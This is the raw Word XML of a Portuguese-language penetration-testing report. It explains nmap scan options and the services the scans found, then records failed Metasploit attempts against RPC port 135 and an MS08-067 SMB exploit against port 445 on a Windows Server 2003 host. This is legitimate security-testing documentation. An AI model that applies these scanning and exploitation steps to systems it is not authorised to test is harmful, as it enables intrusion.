    <w:p w14:paraId="60988CDE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611DB4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43BD624D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Ss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5370EAA1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DE60758" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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6CB4812D" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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s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” permite que a ferramenta tente fazer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SYN do TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CC7CC1" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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O” permite que a ferramenta tente encontrar o sistema operacional utilizado pelo servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DAD70C" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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14:paraId="0478C686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864AA05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38DB4328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, e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC17FE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B214989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070ED395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rro na ferramenta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED7A131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4FB922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7E0925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14:paraId="1031A856" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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sS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5C13A130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81BA63F" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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57C5A9BC" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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S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” permite que a ferramenta tente fazer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SYN do TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550D6C09" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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O” permite que a ferramenta tente encontrar o sistema operacional utilizado pelo servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF66DD5" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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14:paraId="4EE0790B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4906DCB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03D0D393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, e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D51652C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6A340B8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2FF6B6E0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De acordo com a Figura 4,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as portas abertas, e serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D275A9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2F89667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104343EC" wp14:editId="7F915CBE">
            <wp:extent cx="4957296" cy="3505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13" cy="35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EE98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igura 4 – Portas encontradas e os serviços que estavam rodando nelas no momento do escaneamento vi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63041CC0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FCFE24B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Serviços encontrados na Figura 4: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55292A57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b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 xml:space="preserve"> Microsoft Windows RPC </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- Ferramenta semelhante ao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14:paraId="274A364E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Microsoft Windows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 uma distribuição Windows;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65121AFC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Apache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14:paraId="02A22EC9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Microsoft Windows 98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ransporte do modelo OSI para permitir a comunicação de aplicativos locais;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E98474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Microsoft Firmware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14:paraId="738B08CB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DD3C7F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66AB94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14:paraId="26D125A2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9D7BA9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Utilização do comando:</w:t>
      </w:r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spellStart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 -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749DEAFE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94D01FD" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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4A524085" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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” permite que a ferramenta realize o SYN e busque a versão do software rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50820096" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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O” permite que a ferramenta tente encontrar o sistema operacional utilizado pelo servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265D6544" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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14:paraId="6802B552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AF2FFE7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67501715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, os serviços e as versões dos softwares que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06927C7D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BE848D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73EFF773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De acordo com a Figura 5,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as portas abertas, os serviços e a versão dos softwares que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F4FC00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C746457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069FE514" wp14:editId="3F23F413">
            <wp:extent cx="5400040" cy="36163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3D5D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igura 5 - Portas encontradas e versões dos sistemas que elas estavam rodando, no momento do escaneamento vi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7D50F804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647AC7D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Serviços encontrados na Figura 5: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B0F4C7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 xml:space="preserve"> Microsoft Windows RPC </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- Ferramenta semelhante ao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14:paraId="6DAB4710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Microsoft Windows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 uma distribuição Windows;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED229AC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Apache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14:paraId="3F9584E0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Microsoft Windows 98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ransporte do modelo OSI para permitir a comunicação de aplicativos locais;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66175399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Microsoft Firmware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14:paraId="27EF06B3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7E0CD02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14:paraId="2625803F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Utilização do comando</w:t>
      </w:r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spellStart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07B5C569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362FC6C" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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677AACAC" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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lastRenderedPageBreak/>
        <w:t>“-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” permite que a ferramenta utilize o detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683F42D6" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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O” permite que a ferramenta tente encontrar o sistema operacional utilizado pelo servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF3EB59" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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14:paraId="7198ACD7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92BA972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6B103F45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UDP abertas e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6958377F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55DFAC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1172AFD7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De acordo com a Figura 6,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as portas UDP abertas e os serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D08360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54CE387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07392" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61576580" wp14:editId="70DDCF37">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-137160</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5667375" cy="3793490"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21477"/>
                <wp:lineTo x="21564" y="21477"/>
                <wp:lineTo x="21564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181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 6 - Portas UDP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e serviços que estavam rodando nelas no momento do escaneamento vi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41C16A04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40CE93B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left="707" w:hanging="14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lastRenderedPageBreak/>
        <w:t>Serviços encontrados na Figura 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5C44BD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n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14:paraId="64C5EB5D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spellEnd"/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dgm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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E32D6C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snm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14:paraId="01524B86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protocolo utilizado pelo sistema operacional Windows para compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D280B80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L2TP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(Protocolo de Encapsulamento de Camada </w:t>
      </w:r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)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[11] – Protocolo de encapsulamento da Internet, utilizado por uma conexão de VPN (rede virtual privada) para acessar uma rede privada;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144E13B5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at</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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t-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lik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1256BC68" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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t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[3] - protocolo de sincronização de relógios usando UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2486975B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695307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5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="15A30CA3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B287B91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A -O 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4B1945EA" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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239BEC7D" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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“-A” é para usar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a requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCC4004" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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O” permite que a ferramenta tente encontrar o sistema operacional utilizado pelo servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C0B3AB" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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14:paraId="00B97547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5D4C336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2E51E515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descobrir o sistema operacional utilizado pelo servidor explorado e a rota traçada pel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16CE1C3D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1E202E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2AC5849D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De acordo com as Figuras 7 e 8,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a rota traçada para a requisição ao servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D5745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705344" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08636A85" wp14:editId="68FA1567">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>262890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>260985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5019675" cy="3475355"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21430"/>
                <wp:lineTo x="21559" y="21430"/>
                <wp:lineTo x="21559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9E2E9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igura 7 - Rota traçada pel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Parte 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D2CD66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6F1EAA34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0674792A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D5905DE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Serviços encontrados na Figura 7: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42E5AD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>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta semelhante ao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14:paraId="7071D105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 uma distribuição Windows;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596CAF57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14:paraId="398F86A1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ransporte do modelo OSI para permitir a comunicação de aplicativos locais;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522CA927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14:paraId="16620EC5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4ADD47A0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708416" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D140D3F" wp14:editId="654D1B40">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-13335</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>260985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="375856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19779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igura 8 - Rota traçada pel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Parte 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BECC857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CE5ABE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6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="287BFA26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385674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-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07596108" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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0AEC2EED" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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” permite que a ferramenta realize o SYN e busque a versão do software rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D0E45C" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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“-p” indica quais portas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devem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ser usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D561FB" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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O” permite que a ferramenta tente encontrar o sistema operacional utilizado pelo servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461CBBBD" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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é o IP onde está hospedada a aplicação em teste.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575B2E88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014EE52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1E07B49B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 e a versão dos serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A8589B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5BF1EC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</w:p>
    <w:p w14:paraId="2B5CCCBE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De acordo com a Figura 9,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as portas abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22275EFB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03296" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A1B5FA2" wp14:editId="6730AD94">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>291465</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>80010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="491998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815F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9371092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14:paraId="5083A2EE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50E61E5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igura 9 - Versão do software rodando nas portas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vi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73CE7B6F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ab/>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53624B15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Serviços encontrados na Figura 9: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE744E9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 xml:space="preserve"> Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta semelhante ao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14:paraId="4F4B8825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Microsoft Windows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 uma distribuição Windows;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB2C3B1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Apache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14:paraId="280A2562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Microsoft Windows 98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ransporte do modelo OSI para permitir a comunicação de aplicativos locais;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2848F067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Microsoft Firmware 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14:paraId="113B640E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2E7A2F40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0736CA4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7</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="071B8083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451DC628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</w:p>
    <w:p w14:paraId="2247B896" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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348113FB" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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” permite que a ferramenta use o detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E85495" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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“-p” indica quais portas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devem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ser usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A01AE26" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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O” permite que a ferramenta tente encontrar o sistema operacional utilizado pelo servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D82AF5D" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E0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é o IP onde está hospedada a aplicação em teste.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398E482B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2737B1B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43467A59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UDP abertas e a versão e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D08360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4CA196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DFDBAD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4B82E9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E9FAAA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21350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EBCFCF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9019AE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360E1C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C84993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BB5A8D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8DBE60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CD129C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4FCB2E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327BC1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C25F00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C34C34" w14:textId="77777777" w:rsidR="00D640DA" w:rsidRPr="004D4181" w:rsidRDefault="00D640DA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B40B5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</w:p>
    <w:p w14:paraId="68EE36D2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04320" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="517FFDE7" wp14:editId="363C596A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-108585</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1214755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5705475" cy="4083685"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0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De acordo com a Figura 10,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as portas UDP abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B9F2AE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7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igura 10 - Versão do software rodando nas portas UDP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vi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199FAF44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E138412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Serviços encontrados na Figura 10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE5B23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n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14:paraId="3ABB3B30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spellEnd"/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dgm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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDA6273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snm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14:paraId="43FFB097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protocol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compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43267064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lastRenderedPageBreak/>
        <w:t>L2TP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(Protocolo de Encapsulamento de Camada </w:t>
      </w:r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)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[11] – Protocolo de encapsulamento da Internet, utilizado por uma conexão de VPN (rede virtual privada) para acessar uma rede privada;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B27682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at</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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t-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lik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3D792C53" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E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t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[3] - protocolo de sincronização de relógios usando     UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA6307C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9EF810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9F50C1" w14:textId="4A32F79F" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570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4.3.3.2 Ataque à porta RPC via </w:t>
      </w:r>
      <w:proofErr w:type="spell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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41E9FF3D" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E09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8F19C34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arefa realizada dia 10/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780256F2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: 1 hora.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCE7CE0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89953B2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14:paraId="5D2CC7F4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Ataque à porta RPC descoberta na análise de servidor vi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realizada anteriormente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FFB1E3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Tentar se conectar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porta 135 usando o framework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, ferramenta abordada no subcapítulo 3.2, para tentar conseguir privilégios dentro do Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01580791" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570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926FEB3" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570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5805D545" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570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2D39EE7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Tentar configurar algum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atacar a porta 135. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B83FC8E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517C9825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33E5A500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ão consiga ser executado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF7B783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947CD25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1295D2E5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A ferramenta </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">é de difícil configuração e possui uma bibliografia muito ruim para iniciantes. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Não foi possível obter nenhum resultado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C8557D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8845C06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8CB342F" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570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14:paraId="569DDF64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18FE3E3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escolhido para testar o caso específico da porta RPC foi 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auxiliary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scanner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msf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msf_rpc_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.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a ser executado é o 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máquina atacante via TCP.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082625CE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A84F501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19B7E9F1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14:paraId="3F9671C2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996E397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</w:p>
    <w:p w14:paraId="7CA5CF99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strike/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:strike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strike/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> foi enviado, mas não trouxe resultado. Após verificação, foi constatado que o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:strike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strike/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> é voltado pra Windows NT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FF82253" w14:textId="0B76F0C6" w:rsidR="00EE46EF" w:rsidRPr="004D4181" w:rsidRDefault="00EE46EF" w:rsidP="007B4E84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Não foi possível realizar o teste com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>êxito.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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>Pois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, conforme o resultado </w:t>
      </w:r>
      <w:r w:rsidR="007B4E84"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 </w:t>
      </w:r>
      <w:r w:rsidR="007B4E84" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Varredura 2</w:t>
      </w:r>
      <w:r w:rsidR="007B4E84"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 na</w:t>
      </w:r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 seção </w:t>
      </w:r>
      <w:r w:rsidR="007B4E84" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>4.3.3.1,</w:t>
      </w:r>
      <w:r w:rsidR="007B4E84" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r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o sistema operacional utilizado pelo servidor que hospeda a aplicação é </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Windows Server</w:t>
      </w:r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 </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>2003</w:t>
      </w:r>
      <w:r w:rsidR="007B4E84" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007B4E84" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Após verificação, foi constatado que</w:t>
      </w:r>
      <w:r w:rsidR="007B4E84" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> o</w:t>
      </w:r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 enviado</w:t>
      </w:r>
      <w:r w:rsidR="007B4E84"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 no teste</w:t>
      </w:r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 é voltado para Windows NT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001A262F" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570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6378775" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570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B5457B1" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570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14:paraId="0DB4EE64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712A31C1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Tentar atacar a porta 445 usan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automatizados. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC39CE1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Para esse caso,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escolhido foi o MS08-67 disponível no caminho </w:t>
      </w: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smb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/ms08_067_netapi.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Ele serve especificamente para explorar uma vulnerabilidade do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D418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d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. Utilizar mesmo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citado na Sessão de teste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máquina atacante via TCP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D664B37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186050FA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420F520C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14:paraId="60CB7E49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79B88DE2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38280F5D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sistema passou nos testes.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ão foi executado na máquina do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E22ACA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46907694" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E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F21D486" w14:textId="77777777" w:rsidR="00570E09" w:rsidRPr="004D4181" w:rsidRDefault="00570E09" w:rsidP="00570E09">
      <w:pPr>
        <w:tabs>
